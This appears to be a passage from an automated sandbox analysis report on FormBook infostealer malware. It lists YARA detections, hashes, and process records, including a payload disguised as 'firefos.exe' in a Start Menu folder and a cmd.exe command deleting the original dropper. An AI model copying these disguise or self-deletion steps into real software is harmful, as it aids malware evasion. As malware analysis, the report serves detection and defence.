• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:04
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:
                                                                                                                                                            Imagebase:0xffca0000
                                                                                                                                                            File size:3229696 bytes
                                                                                                                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:18
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:26
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:30
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:279552 bytes
                                                                                                                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:35
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
                                                                                                                                                            Imagebase:0x4a770000
                                                                                                                                                            File size:302592 bytes
                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:47
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            General

                                                                                                                                                            Start time:08:45:19
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis
